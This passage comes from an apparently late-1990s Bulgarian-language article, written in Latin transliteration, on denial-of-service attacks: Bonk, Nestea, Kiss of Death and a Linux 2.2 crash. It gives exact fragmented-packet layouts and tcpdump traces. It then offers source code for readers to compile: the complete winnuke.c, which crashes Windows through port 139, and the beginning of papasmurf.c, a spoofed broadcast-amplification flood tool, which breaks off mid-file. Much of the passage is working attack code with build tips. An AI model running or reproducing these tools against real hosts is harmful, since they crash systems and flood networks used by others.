+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|Offset | (reserved)| Flags | Window |
| 5 | 0 | SYN | 08 00 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Checksum | Urgent Pointer |
| 9A 9A | 00 00 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Danni: niama
****************************************************************************
2.2.4. Bonk
-----------
Bonk, koito izleze na 1-May-1998, se bazira na Teardrop, no ne e suvsem
sushtoto. Suzdaden e da atakuva specialno Windows mashini s patch sreshtu
Teardrop, iavno razchita na niakakuv bug v samia patch. Pravete si sami
izvodi za Windows i za Microsoft... E, ne e lesno da se opravi murliav kod
bez komentari ;-)
Tova, koeto Bonk pravi, e vsushtnost pochti Teardrop, no naopaki (heheh,
stranno zvuchi, nali?;-). Dokato ideiata na Teardrop e vtoria fragment da
popada izcialo v purvia (t.e. ostavia pole otpred i otzad), Bonk se stremi
da pravi obratnoto - fragmentut pak da popada vutre, no kraiat mu da suvpada
s kraia na purvia fragment (zalepva za nego, no ne otvun, a otvutre).
Razlikata mezhdu paketite, izprateni ot Bonk, i tezi ot Teardrop, e samo vuv
fragment offset-a na vtoria paket. Dokato pri Teardrop tam se sudurzha 3
(t.e. otmestvane 24 baita), pri Bonk tova e 4 (t.e. otmestvane 32 baita).
Tazi DoS ataka izglezhda ne zasiaga drugite operacionni sistemi. A eto i
kakvi paketi tochno se prashtat:
Fragment #1:
IP Header:
1 1 1 1 1 1 1 1 1 1 2 2 2 2 2 2 2 2 2 2 3 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|Version| IHL | TOS | Total Length |
| 4 | 5 | 00 | 00 38 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Identification |Flags| Fragment Offset |
| 04 55 | MF | 00 00 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| TTL | Protocol | Header Checksum |
| FF | 11 = UDP | (filled by kernel) FE 42 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Source Address (spoofed sample) |
| 0C 0D 0E 0F |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Destination address (at test = localhost) |
| 7F 00 00 01 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
UDP Header:
1 1 1 1 1 1 1 1 1 1 2 2 2 2 2 2 2 2 2 2 3 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Source Port | Destination Port |
| 00 35 | 00 35 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Length | Checksum |
| 00 24 | 00 00 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Danni:
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 00 00 00 00 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 00 00 00 00 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 00 00 00 00 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 00 00 00 00 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 00 00 00 00 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 00 00 00 00 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 00 00 00 00 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Fragment #2:
IP Header:
1 1 1 1 1 1 1 1 1 1 2 2 2 2 2 2 2 2 2 2 3 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|Version| IHL | TOS | Total Length |
| 4 | 5 | 00 | 00 18 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Identification |Flags| Fragment Offset |
| 04 55 | | 00 04 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| TTL | Protocol | Header Checksum |
| FF | 11 = UDP | (filled by kernel) 1E 5F |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Source Address (spoofed sample) |
| 0C 0D 0E 0F |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Destination address (at test = localhost) |
| 7F 00 00 01 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Danni (sushtite ot nachaloto na minalia paket):
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 00 35 00 35 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
****************************************************************************
2.2.5. Nestea
-------------
Nestea izpolzvashe "Off by One IP Header" greshkata vuv fragmentation koda
na Linux iadrata 2.0.* i 2.1.*, nai-novite po onova vreme (16-Apr-1998).
Zabiva i niakoi Windows mashini.
Po-kusno izleze i nestea2.c, koiato izprashta absoliutno sushtite paketi, no
prosto davashta malko povechko opciiki.
Pogled v source koda na Nestea izdava, che vsushtnost avtorut e hvanal i e
modificiral newtear.c. V tova, razbira se, niama nishto losho - dobrite
programisti pishat dobur kod, a istinski strahotnite programisti vzimat
dobur kod "na zaem" ;-) Kakto i da e, rezultatut e edin - nova DoS ataka.
Nestea.c izprashta tri UDP fragmenta. Purviat e suvsem normalen paket -
26-baitov IP datagram, v koito UDP dannite (osven UDP headera) sa 10 baita.
Vse edno, che izprashtat normalen nefragmentiran paket, na koito obache sa
mu vdignali "More Fragments" flaga.
Izprashta se i vtori fragment, uzh produlzhenie na purvia, s goliam Total
Length (136) i Fragment Offset (6, t.e. 48 baita), sus svalen "More
Fragments".
Za kapak se izprashta i treti paket s oshte po-goliama dulzhina (284 baita)
i vdignat "More Fragments".
Tuk e vuzmozhno da ima bug v programata - purvo se populva validen UDP
header (s dulzhina dosta po-kusa, otkolkoto bi triabvala, za da zapulni
284-baitov paket), obache avtorut zabravia da si uvelichi pointer-cheto s
chetiri baita, taka che polovinata UDP Header se zamazva s random danni (a
imenno UDP Length i Checksum). Kakto i da e, sled kato nestea raboti, znachi
niama za kakvo da se pritesniavame.
Eto kak izglezhda atakata za stranichen nabliudatel (mama mu stara, i shte
sniff-va, a? ;-) :
Fragment #1:
IP Header:
1 1 1 1 1 1 1 1 1 1 2 2 2 2 2 2 2 2 2 2 3 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|Version| IHL | TOS | Total Length |
| 4 | 5 | 00 | 00 26 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Identification |Flags| Fragment Offset |
| 00 F2 | MF | 00 00 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| TTL | Protocol | Header Checksum |
| 40 | 11 = UDP | (filled by kernel) C0 B8 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Source Address (spoofed sample) |
| 0C 0D 0E 0F |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Destination address (at test = localhost) |
| 7F 00 00 01 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
UDP Header:
1 1 1 1 1 1 1 1 1 1 2 2 2 2 2 2 2 2 2 2 3 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Source Port (random) | Destination Port (random) |
| B6 E6 | 7C C0 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Length | Checksum |
| 00 12 | 00 00 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Danni:
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 00 00 00 00 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 00 00 00 00 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 00 00 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Fragment #2:
IP Header:
1 1 1 1 1 1 1 1 1 1 2 2 2 2 2 2 2 2 2 2 3 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|Version| IHL | TOS | Total Length |
| 4 | 5 | 00 | 00 88 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Identification |Flags| Fragment Offset |
| 00 F2 | | 00 06 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| TTL | Protocol | Header Checksum |
| 40 | 11 = UDP | (filled by kernel) E0 50 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Source Address (spoofed sample) |
| 0C 0D 0E 0F |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Destination address (at test = localhost) |
| 7F 00 00 01 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Danni (sushtite ot nachaloto na minalia fragment, no sus smenen UDP
Header... A, de? Ta nali tova e fragment? Anyway)
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| B6 E6 7C C0 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 00 74 | 00 00 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 00 00 | 00 00 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 00 00 | 00 00 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 00 00 | 00 00 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 00 00 | 00 00 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 00 00 | 00 00 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 00 00 | 00 00 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 00 00 | 00 00 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 00 00 | 00 00 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| ...
+-+-+-+-+-
Fragment #3:
IP Header:
1 1 1 1 1 1 1 1 1 1 2 2 2 2 2 2 2 2 2 2 3 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|Version| IHL | TOS | Total Length |
| 4 | F | 00 | 01 1C |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Identification |Flags| Fragment Offset |
| 00 F2 | MF | 00 00 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| TTL | Protocol | Header Checksum |
| 40 | 11 = UDP | (filled by kernel) B5 C2 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Source Address (spoofed sample) |
| 0C 0D 0E 0F |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Destination address (at test = localhost) |
| 7F 00 00 01 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 00 00 | 00 00 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 00 00 | 00 00 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 00 00 | 00 00 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 00 00 | 00 00 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 00 00 | 00 00 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 00 00 | 00 00 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 00 00 | 00 00 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 00 00 | 00 00 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 00 00 | 00 00 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 00 00 | 00 00 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
UDP Header:
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Source Port | Destination Port |
| B6 E6 | 7C C0 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Length (random) | Checksum (random) |
| B1 AA | CF 37 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Danni (random):
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 2D 45 | 03 00 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 44 00 | 00 00 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 20 01 | 00 00 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 00 00 | 08 00 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| ...
+-+-+-+-+-
****************************************************************************
2.2.6. Kiss of Death
--------------------
Kiss of Death (kod.c) izleze dosta naskoro. Bazira se na tova, che
obrabotkata na IGMP paketi v Windows ne e napisana kato horata. Kod
predizvikva sin ekran pri Windows 98 / 98se, i ubiva TCP stack-a. Kato
natisne Enter, potrebiteliat mozhe da si produlzhi rabotata s Windows, no
veche si niama TCP stack. Paketi mogat da izlizat ot nego, no toi ne se
useshta, che poluchava paketi. Ako primerno se pravi ping na niakakuv adres,
ICMP echo request paketite shte izlizat ot nego, no toi niama da zabeliazva
echo reply-ovete.
Reshenieto e potrebiteliat otnovo da se reconnectne kum ISP-to si (ako e s
modem... Ako e v TCP/IP mrezha veche ne znam :-)
Programata izprashta edin edinstven IGMP paket, razdelen obache na 11
fragmenta, koito se izprashtat v obraten red. Za vseki sluchai posle se
izprashtat oshte vednuzh, pak v obraten red, taka che obshto izpratenite
datagrams sa 22 broia.
Interesnoto e, che se izprashta suvsem validen IGMP paket, makar i naopaki,
koeto vse pak uspiava da predizvika greshka v Windows.
A oshte po-interesnoto e, che nai-normalnata komanda "ping" pod UNIX, kogato
i se zadade naprimer dulzhina na paketa 32000 ili neshto takova, sushto go
fragmentira, kato otgore na tova izprashta ICMP fragmentite v obraten red...
Ami Kiss of Death pravi sushtoto, no s IGMP vmesto ICMP.
Tui kato fragmentite sa suvsem legalni, niama kakvo da pulnia tuk statiata s
IP dump. Prosto eto kak izglezhda atakata, gledana s tcpdump:
15:53:37.899412 12.13.14.15 > localhost: (frag 48648:200@14800)
15:53:37.901212 12.13.14.15 > localhost: (frag 48648:1480@13320+)
15:53:37.901392 12.13.14.15 > localhost: (frag 48648:1480@11840+)
15:53:37.901534 12.13.14.15 > localhost: (frag 48648:1480@10360+)
15:53:37.901681 12.13.14.15 > localhost: (frag 48648:1480@8880+)
15:53:37.901828 12.13.14.15 > localhost: (frag 48648:1480@7400+)
15:53:37.901972 12.13.14.15 > localhost: (frag 48648:1480@5920+)
15:53:37.902117 12.13.14.15 > localhost: (frag 48648:1480@4440+)
15:53:37.902262 12.13.14.15 > localhost: (frag 48648:1480@2960+)
15:53:37.902401 12.13.14.15 > localhost: (frag 48648:1480@1480+)
15:53:37.902541 12.13.14.15 > localhost: igmp-0 [v0][|igmp] (frag
48648:1480@0+)
i posle sushtoto tova, povtoreno oshte vednuzh (za vseki sluchai).
Skoro sled tova izleze i kox.c ot drug avtor, koiato uzh bila po-dobra, sus
spoofing i t.n., no v neia ne vidiah nishto, koeto da go niama i v purvata,
taka che - polzvaite si KOD.
****************************************************************************
2.2.7. Linux 2.2 DoS attack
---------------------------
L22dos e ataka, predizvikvashta kernel panic na Linux 2.2.x iadra (testvano
ot avtora vurhu 2.2.7 i 2.2.9). Izleze na 1-Jun-1999. Za suzhalenie, az
lichno ne uspiah da go testvam vurhu sebe si, tui kato po vremeto, kogato se
sdobih s neia (okolo 16-17 Iuni) veche biah s 2.2.10, koito veche e fix-nat,
no drugi hora mnogo uspeshno izdurzhaha testovete ;-)
Vecherta na 1-Jun Alan Cox potvurzhdava bug-a i puska patch. Avtorut na
l22dos si misli, che rabotata e v 1024-baitovata dulzhina na paketa i random
type/subtype, sequence i drugi razni raboti. Spored Alan Cox obache
programkata bila bugava, i zatova predizvikvala kernel panic.
Vsichko, koeto programata pravi, e da izprati ICMP paket sus random source
address, icmp type, icmp code, icmp sequence number... I tova e! Izprashtat
se 1000 paketa. Po razbiraemi prichini, shema na izpratenite paketi ne e
vkliuchena.
****************************************************************************
3. Source Codes
---------------
Mozhe bi vi e interesno da vidite kakvo tochno predstavliavat programite,
ili vi e interesno da si gi imate. E, eto malko, da nacheshete krastata ;-)
Predostavenite tuk source-ove sa na chisto C i se kompilirat bez nikakvi
problemi pod Linux, a bi triabvalo i na drugi platformi. Izkliuchenie
praviat edinstveno papasmurf.c i l22dos.cpp.
papasmurf.c ne se kompilira kakto triabva pod Linux. Edinstvenata promiana,
koiato se nalaga da napravite, za da se kompilira normalno, e da zamenite na
redove ot 507 do 511 poletata v UDP headera s istinskite imena, s koito sa
definirani v linux/udp.h, a imenno source, dest i len.
l22dos.cpp puk e C++ file. Oburnete vnimanie na tova, zashtoto niama da
uspeete da go kompilirate s gcc. Za celta izpolzvaite g++.
----- winnuke.c ----- cut ----- cut -----
/* winnuke.c - (05/07/97) By _eci */
/* Tested on Linux 2.0.30, SunOS 5.5.1, and BSDI 2.1 */
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>
#define dport 139 /* Attack port: 139 is what we want */
int x, s;
char *str = "Bye"; /* Makes no diff */
struct sockaddr_in addr, spoofedaddr;
struct hostent *host;
int open_sock(int sock, char *server, int port) {
struct sockaddr_in blah;
struct hostent *he;
bzero((char *)&blah,sizeof(blah));
blah.sin_family=AF_INET;
blah.sin_addr.s_addr=inet_addr(server);
blah.sin_port=htons(port);
if ((he = gethostbyname(server)) != NULL) {
bcopy(he->h_addr, (char *)&blah.sin_addr, he->h_length);
}
else {
if ((blah.sin_addr.s_addr = inet_addr(server)) < 0) {
perror("gethostbyname()");
return(-3);
}
}
if (connect(sock,(struct sockaddr *)&blah,16)==-1) {
perror("connect()");
close(sock);
return(-4);
}
printf("Connected to [%s:%d].\n",server,port);
return;
}
void main(int argc, char *argv[]) {
if (argc != 2) {
printf("Usage: %s <target>\n",argv[0]);
exit(0);
}
if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
perror("socket()");
exit(-1);
}
open_sock(s,argv[1],dport);
printf("Sending crash... ");
send(s,str,strlen(str),MSG_OOB);
usleep(100000);
printf("Done!\n");
close(s);
}
----- cut ----- cut -----
----- papasmurf.c ----- cut ----- cut -----
/*
* (papa)smurf.c v5.0 by TFreak - http://www.rootshell.com
*
* A year ago today I made what remains the questionable decision of
* releasing my program 'smurf', a program which uses broadcast "amplifiers"
* to turn an icmp flood into an icmp holocaust, into the hands of packet
* monkeys, script kiddies and all round clueless idiots alike. Nine months
* following, a second program 'fraggle', smurfs udp cousin, was introducted
* into their Denial of Service orgy. This brings us to today, July 28,
* 1998, one year after my first "mistake". The result, proof that history
* does repeat itself and a hybrid of the original programs.
*
* First may I say that I in no way take credit for "discovering" this.
* There is no doubt in my mind that this idea was invisioned long before
* I was even sperm -- I merely decided to do something about it. Secondly,
* if you want to hold me personally responsible for turning the internet
* into a larger sesspool of crap than it already is, then may I take this
* opportunity to deliver to you a message of the utmost importance -- "Fuck
* you". If I didn't write it, someone else would have.
*
* I must admit that there really is no security value for me releasing this
* new version. In fact, my goals for the version are quite silly. First,
* I didn't like the way my old code looked, it was ugly to look at and it
* did some stupid unoptimized things. Second, it's smurfs one year
* birthday -- Since I highly doubt anyone would have bought it a cake, I
* thought I would do something "special" to commemorate the day.
*
* Hmm, I am starting to see why I am known for my headers (wage eats
* playdough!).
*
* Well, I guess this wouldn't be the same if I did not include some sort
* of shoutouts, so here goes...
*
* A hearty handshake to...
*
* o MSofty, pbug, Kain -- No matter which path each of you decides to
* take in the future, I will always look back upon these days as one
* of the most enjoyable, memorable and thought-provoking experiences
* of my life. I have nothing but the highest degree of respect for
* each of you, and I value your friendship immensely. Here's to
* living, learning and laughing -- Cheers gentlemen. --Dan
* o Hi JoJo!
* o morbid and his grandam barbiegirl gino styles, yo.
* o The old #havok crew.
* o Pharos,silph,chris@unix.org,Viola,Vonne,Dianora,fyber,silitek,
* brightmn,Craig Huegen,Dakal,Col_Rebel,Rick the Temp,jenni`,Paige,
* RedFemme,nici,everlast,and everyone else I know and love.
*
* A hearty enema using 15.0mol/L HCl to...
*
* o #Conflict. Perhaps you are just my scapegoat of agression, but you
* all really need to stop flooding efnet servers/taking over irc
* channels/mass owning networks running old qpoppers and get a
* fucking life.
* o BR. It wouldn't be the same without you in here, but to be honest
* you really aren't worth the space in the already way-to-bloated
* header, nor the creative energy of me coming up with an intricate
* bash that you will never understand anyway. Shrug, hatred disguises
* itself as apathy with time.
*
* I feel like I'm writing a fucking essay here...
*
* To compile: "gcc -DLINUX -o smurf5 papasmurf.c" if your LINUXish.
* or just
* "gcc -o smurf5 papasmurf.c" if your BSDish.
*
* Old linux kernels won't have BSD header support, so this may not compile.
* If you wish a linux-only version, do it yourself, or mail
* tfreak@jaded.net, and I might lend you mine.
*
* And most importantly, please don't abuse this. If you are going to do
* anything with this code, learn from it.
*
* I remain,
*
* TFreak.
*
*/
/* End of Hideously Long Header */
#include <stdio.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <arpa/inet.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
#include <time.h>
#ifdef LINUX
#define __FAVOR_BSD /* should be __FAVOUR_BSD ;) */
#ifndef _USE_BSD
#define _USE_BSD
#endif
#endif
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <netinet/udp.h>
#ifdef LINUX
#define FIX(n) htons(n)
#else
#define FIX(n) (n)
#endif
struct smurf_t
{
struct sockaddr_in sin; /* socket prot structure */
int s; /* socket */
int udp, icmp; /* icmp, udp booleans */
int rnd; /* Random dst port boolean */
int psize; /* packet size */
int num; /* number of packets to send */
int delay; /* delay between (in ms) */
u_short dstport[25+1]; /* dest port array (udp) */
u_short srcport; /* source port (udp) */
char *padding; /* junk data */
};
/* function prototypes */
void usage (char *);
u_long resolve (char *);
void getports (struct smurf_t *, char *);
void smurficmp (struct smurf_t *, u_long);
void smurfudp (struct smurf_t *, u_long, int);
u_short in_chksum (u_short *, int);
int
main (int argc, char *argv[])
{
struct smurf_t sm;
struct stat st;
u_long bcast[1024];
char buf[32];
int c, fd, n, cycle, num = 0, on = 1;
FILE *bcastfile;
/* shameless self promotion banner */
fprintf(stderr, "\n(papa)smurf.c v5.0 by TFreak\n\n");
if (argc < 3)
usage(argv[0]);
/* set defaults */
memset((struct smurf_t *) &sm, 0, sizeof(sm));
sm.icmp = 1;
sm.psize = 64;
sm.num = 0;
sm.delay = 10000;
sm.sin.sin_port = htons(0);
sm.sin.sin_family = AF_INET;
sm.srcport = 0;
sm.dstport[0] = 7;
/* resolve 'source' host, quit on error */
sm.sin.sin_addr.s_addr = resolve(argv[1]);
/* open the broadcast file */
if ((bcastfile = fopen(argv[2], "r")) == NULL)
{
perror("Opening broadcast file");
exit(-1);
}
/* parse out options */
optind = 3;
while ((c = getopt(argc, argv, "rRn:d:p:P:s:S:f:")) != -1)
{
switch (c)
{
/* random dest ports */
case 'r':
sm.rnd = 1;
break;
/* random src/dest ports */
case 'R':
sm.rnd = 1;
sm.srcport = 0;
break;
/* number of packets to send */
case 'n':
sm.num = atoi(optarg);
break;
/* usleep between packets (in ms) */
case 'd':
sm.delay = atoi(optarg);
break;
/* multiple ports */
case 'p':
if (strchr(optarg, ','))
getports(&sm, optarg);
else
sm.dstport[0] = (u_short) atoi(optarg);
break;
/* specify protocol */
case 'P':
if (strcmp(optarg, "icmp") == 0)
{
/* this is redundant */
sm.icmp = 1;
break;
}
if (strcmp(optarg, "udp") == 0)
{
sm.icmp = 0;
sm.udp = 1;
break;
}
if (strcmp(optarg, "both") == 0)
{
sm.icmp = 1;
